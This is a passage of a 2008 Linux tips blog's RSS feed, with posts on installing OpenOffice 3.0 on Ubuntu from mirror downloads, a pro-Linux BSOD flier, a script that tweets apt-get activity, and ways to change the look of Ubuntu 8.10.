<p><code>wget http://ftp.spnet.net/openoffice/stable/3.0.0/OOo_3.0.0_LinuxIntel_install_en-US_deb.tar.gz</code></p>
<p><code><br />
tar -xvzf OOo_3.0.0_LinuxIntel_install_en-US_deb.tar.gz</code></p>
<p><em>cd</em> into <em>DEBS</em> directory and issue the following command:<br />
<code>sudo dpkg -i *.deb</code><br />
Now we need to add menu entries<br />
<code>cd desktop-integration</code></p>
<p><code><br />
sudo dpkg -i *.deb</code></p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/13/open-office-30-final-officially-announced-expect-a-record-download/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Switch to Linux Today! bsod Linux Flier</title>
		<link>http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/</link>
		<comments>http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/#comments</comments>
		<pubDate>Mon, 13 Oct 2008 03:50:12 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Desktop]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Wallpapers]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[flier]]></category>
		<category><![CDATA[GIMP]]></category>
		<category><![CDATA[gos]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[mandriva]]></category>
		<category><![CDATA[mintLinux]]></category>
		<category><![CDATA[picture]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=172</guid>
		<description><![CDATA[There are many reasons to switch to Linux, but this is one of them - to get rid of BSOD!

Download it, print it and paste it on your college flier board if you ever need to show your Linux love, Windows hatred, and bsod anger.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>There are many reasons to switch to Linux, but this is one of them &#8211; to get rid of BSOD!</p>
<p>Download it, print it and paste it on your college flier board if you ever need to show your Linux love, Windows hatred, and bsod anger.</p>
<p><span id="more-172"></span></p>
<div id="attachment_173" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/bsod-linux-flier.png"><img class="size-medium wp-image-173" title="bsod-linux-flier" src="http://www.quicktweaks.com/wp-content/uploads/2008/10/bsod-linux-flier-300x227.png" alt="bsod linux flier" width="300" height="227" align="middle" /></a><p class="wp-caption-text">bsod Linux flier</p></div>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Install OpenOffice 3.0 Final in Ubuntu</title>
		<link>http://www.quicktweaks.com/2008/10/11/install-openoffice-30-final-in-ubuntu/</link>
		<comments>http://www.quicktweaks.com/2008/10/11/install-openoffice-30-final-in-ubuntu/#comments</comments>
		<pubDate>Sat, 11 Oct 2008 06:15:15 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[alien]]></category>
		<category><![CDATA[apt-get]]></category>
		<category><![CDATA[deb]]></category>
		<category><![CDATA[dpkg]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[OpenOffice]]></category>
		<category><![CDATA[rpms]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[word]]></category>
		<category><![CDATA[writer]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=156</guid>
		<description><![CDATA[OpenOffice 3.0 Final is to be officially released on Monday, October 13 it has already been uploaded in many servers. If you can't wait a couple of more days to get it installed in your Ubuntu box, here is a quick way to install it.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p style="text-align: left;"><em><strong>[Updated: .deb packages also started showing up]</strong></em> OpenOffice 3.0 Final is all set to be officially released on Monday, October 13 but it has already been uploaded to many servers worldwide. <span style="text-decoration: line-through;">As of this writing there is no .deb package available. </span>If you can&#8217;t wait a couple of more days to get it installed in your Ubuntu box, here is a quick way to install it.</p>
<p style="text-align: left;"><span id="more-156"></span></p>
<p style="text-align: center;"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/openoffice3.png"><img class="size-medium wp-image-158 aligncenter" title="openoffice3" src="http://www.quicktweaks.com/wp-content/uploads/2008/10/openoffice3-300x187.png" alt="" width="300" height="187" /></a></p>
<p style="text-align: center;"><!--more--></p>
<p style="text-align: left;"><em>update: .deb packages started showing up. Install OpenOffice 3.0 final by issuing:</em></p>
<p style="text-align: left;"><em>wget http://openofficeorg.secsup.org/stable/3.0.0/OOo_3.0.0_LinuxIntel_install_en-US_deb.tar.gz</em></p>
<p style="text-align: left;"><em><code>tar -xvzf </code>OOo_3.0.0_LinuxIntel_install_en-US_deb.tar.gz</em></p>
<p style="text-align: left;">cd OOO300_m9_native_packed-1_en-US.9358/DEBS/</p>
<p style="text-align: left;"><em>sudo dpkg -i *.deb</em></p>
<p style="text-align: left;">That&#8217;s it!</p>
<p style="text-align: left;">
<p style="text-align: left;">1. Get the file. Either download it manually or get it from your Terminal window. OpenOffice 3.0 has been uploaded to different servers, you can find it in &#8230;/stable/3.0.0/ folder. You can get it by issuing one of the following commands:</p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p style="text-align: left;"><code>wget http://openoffice.mirror.wrpn.net/stable/3.0.0/OOo_3.0.0_LinuxIntel_install_en-US.tar.gz</code></p>
<p style="text-align: left;">OR</p>
<p style="text-align: left;"><code>wget http://mirrors.isc.org/pub/openoffice/stable/3.0.0/OOo_3.0.0_LinuxIntel_install_en-US.tar.gz</code></p>
<p style="text-align: left;">OR</p>
<p style="text-align: left;"><code>http://ftp.osuosl.org/pub/openoffice/stable/3.0.0/OOo_3.0.0_LinuxIntel_install_en-US.tar.gz</code></p>
<p style="text-align: left;">OR</p>
<p style="text-align: left;"><code>ftp://ftp.osuosl.org/pub/openoffice/stable/3.0.0/OOo_3.0.0_LinuxIntel_install_en-US.tar.gz</code></p>
<p style="text-align: center;"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/openoffice3.png"><br />
</a></p>
<p style="text-align: left;">2. Untar it</p>
<p style="text-align: left;"><code>tar -xvzf OOo_3.0.0_LinuxIntel_install_en-US.tar.gz</code></p>
<p style="text-align: left;">3. Get inside the folder</p>
<p style="text-align: left;"><code>cd OOO300_m9_native_packed-1_en-US.9358/RPMS</code></p>
<p style="text-align: left;">4. As of this writing, .deb package was not available so you need to install alien</p>
<p style="text-align: left;"><code>sudo apt-get install alien</code></p>
<p style="text-align: left;">5. Convert all rpms packages to debs</p>
<p style="text-align: left;"><code>alien -k *.*</code></p>
<p style="text-align: left;">6. Install OpenOffice</p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p style="text-align: left;"><code>sudo dpkg -i *.deb</code></p>
<p style="text-align: left;">7. Now we need to add menu entries</p>
<p style="text-align: left;"><code>cd desktop-integration</code></p>
<p style="text-align: left;">sudo dpkg -i *.deb</p>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/11/install-openoffice-30-final-in-ubuntu/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>Tweet your &#8216;apt-get&#8217;! Let Twitter keep track of whatever you install in Ubuntu</title>
		<link>http://www.quicktweaks.com/2008/10/05/tweet-your-apt-get-let-twitter-keep-track-of-whatever-you-install-in-ubuntu/</link>
		<comments>http://www.quicktweaks.com/2008/10/05/tweet-your-apt-get-let-twitter-keep-track-of-whatever-you-install-in-ubuntu/#comments</comments>
		<pubDate>Sun, 05 Oct 2008 19:28:37 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[System]]></category>
		<category><![CDATA[Terminal]]></category>
		<category><![CDATA[apt-get]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[tapt]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=101</guid>
		<description><![CDATA[This script, tapt, tweets whatever you install, remove or perform other operations with 'apt-get' in Ubuntu to your Tweeter account.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>If you are like me who often likes to test one of the thousand applications available for Ubuntu and like to keep track of whatever you install or remove, here is a script for you. This script, <em>tapt</em>, tweets whatever you install, remove or perform other operations with <em>&#8216;apt-get&#8217;</em> in Ubuntu to your Tweeter account.<br />
<a title="more details on tapt" href="http://www.quicktweaks.com/tapt" target="_self">Click here for more details on this script</a></p>
<p style="text-align: center;"> </p>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/05/tweet-your-apt-get-let-twitter-keep-track-of-whatever-you-install-in-ubuntu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ubuntu 8.10 hits beta; the look lets the fans down again</title>
		<link>http://www.quicktweaks.com/2008/10/02/ubuntu-810-beta-hits-beta-the-look-lets-the-fans-down-again/</link>
		<comments>http://www.quicktweaks.com/2008/10/02/ubuntu-810-beta-hits-beta-the-look-lets-the-fans-down-again/#comments</comments>
		<pubDate>Thu, 02 Oct 2008 22:58:03 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Desktop]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Wallpapers]]></category>
		<category><![CDATA[appearance]]></category>
		<category><![CDATA[AWN]]></category>
		<category><![CDATA[Design]]></category>
		<category><![CDATA[dock]]></category>
		<category><![CDATA[gnome-do]]></category>
		<category><![CDATA[Hardy]]></category>
		<category><![CDATA[images]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=75</guid>
		<description><![CDATA[Ubuntu 8.10 intrepid Ibex hit the market today but its appearance ONCE AGAIN came as a great disappointment. Since this is a beta version, we can't expect any change in the features now. All the works, which will be done until the final version hits the market on 30th October, will be only to fix the bugs. So, just keep your finger corssed until Jaunty Jackalope is released. If you are disappointed with the current appearance of your favorite Linux distro, here are some ways to give it a new fancy life again.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;"><a title="Intrepid Ibex" href="http://www.ubuntu.com/testing/intrepid/beta" target="_blank">Ubuntu 8.10 intrepid Ibex beta</a> hit the market today but its appearance ONCE AGAIN came as a great disappointment. Since this is a beta version, we can&#8217;t expect any change in the features now. All the works, which will be done until the final version hits the market on 30th October, will be only to fix the bugs. So, just keep your finger corssed until <a title="Jaunty Jackalope" href="https://lists.ubuntu.com/archives/ubuntu-devel-announce/2008-September/000481.html" target="_blank">Jaunty Jackalope</a> is released. If you are disappointed with the current appearance of your favorite Linux distro, here are some ways to give it a new fancy life again.</p>
<p><span id="more-75"></span></p>
<p>Everything is right about Ubuntu expect its look.  Changing its appearance is one of the highly requested features by many fans around the world. Fans were expecting a change with Hardy Heron, but it didn&#8217;t happen. They had a lot of expectations with Intrepid Ibex but it came with nothing more than small color changes and this non-sense wallpaper:</p>
<div id="attachment_76" class="wp-caption aligncenter" style="width: 510px"><a href="http://None"><img class="size-full wp-image-76" title="ubuntu-ibex-screenshot" src="http://www.quicktweaks.com/wp-content/uploads/2008/10/ubuntu-ibex-screenshot.jpg" alt="The ugliest wallpaper ever" width="500" height="276" /></a><p class="wp-caption-text">The ugliest wallpaper ever</p></div>
<p>If you hate Ubunut&#8217;s default appearance, here are some ways to make it look best of the all OSes</p>
<ul>
<li>Install Emerald Theme manager and <a title="emearld themes" href="http://gnome-look.org/content/search.php?xsortmode=new&amp;search=1&amp;type=0&amp;name=emerald&amp;user=&amp;text=&amp;sort=0&amp;scorefilter=0&amp;license=99&amp;page=0" target="_blank">download emerald themes </a>from <a title="gnome look" href="http://gnome-look.org" target="_blank">gnome-look.org</a>. I&#8217;m using <a title="my desktop theme" href="http://gnome-look.org/content/show.php/Scaled+Black+Mod?content=45402" target="_blank">Scaled_Black_Mod </a></li>
<li>Get rid of the bottom panel and replace it with some beautiful and productive dock. <a title="Three Little Things To Make Your Ubuntu Desktop Beautiful and Productive" href="http://www.quicktweaks.com/2008/04/11/three-little-things-to-make-your-ubuntu-desktop-beautiful-and-productive/" target="_blank">Here is a nice tutorial on how to do this.</a></li>
<li>Get mails, weather, and system info right on your desktop with conky. After this &#8216;beauty&#8217; comes as a bonus for you. <a title="Gmail+Weather+Beauty right on your Ubuntu desktop" href="http://www.quicktweaks.com/2008/09/27/gmail-weather-beauty-right-on-your-ubuntu-desktop/" target="_blank">Read my previous post on how to do this</a>. I&#8217;ve included all the required files and fonts so it shoudn&#8217;t take you more than 10minutes.</li>
<li><a title="Ubuntu wallpapers" href="http://www.quicktweaks.com/2008/10/02/10-wallpapers-for-ubuntu-lovers/" target="_blank">Download Ubuntu wallpapers to show your Ubuntu love.</a> If you love nature and prefer some natural backgrounds instead, you can get them from <a title="Devian art wallpapers" href="http://wallpaper.deviantart.com/" target="_blank">devian art</a>. Other place to look for the beautiful wallpapers are: <a title="InterfaceLIFT wallpapers" href="http://interfacelift.com/wallpaper_beta/downloads/date/any/" target="_blank">InterfaceLIFT</a>, and <a title="Studio Twenty Eight wallpapers" href="http://www.studiotwentyeight.com/wallpapers.htm" target="_blank">StudioTwentyEight</a></li>
<li>If you want to get rid of the top menu, you can <a title="Circular Application Menu" href="http://code.google.com/p/circular-application-menu/" target="_blank">replace it with a nice looking cirular application menu</a>.</li>
</ul>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p>After a couple of hours your ugly desktop should more beautiful then mine:</p>
<div id="attachment_36" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/09/screenshot-2.png"><img class="size-medium wp-image-36" title="My Desktop Screenshot with Gnome-do" src="http://www.quicktweaks.com/wp-content/uploads/2008/09/screenshot-2-300x187.png" alt="Desktop Screenshot with Gnome-Do" width="300" height="187" /></a><p class="wp-caption-text">Desktop Screenshot with conky, AWN, Scaled Black mod theme, and Gnome-Do</p></div>
<div class="mceTemp mceIEcenter"></div>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: left">Let&#8217;s hope Jackalope comes in a new look.</div>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: left"></div>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: left">If you have a beautiful looking desktop, share with us. Shoot an email to admin[at]quickktweaks[dot]com with the screenshot(s) of your desktop. Beautiful ones will get published.</div>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/02/ubuntu-810-beta-hits-beta-the-look-lets-the-fans-down-again/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 1.354 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2009-11-29 02:42:39 -->
<!-- Compression = gzip -->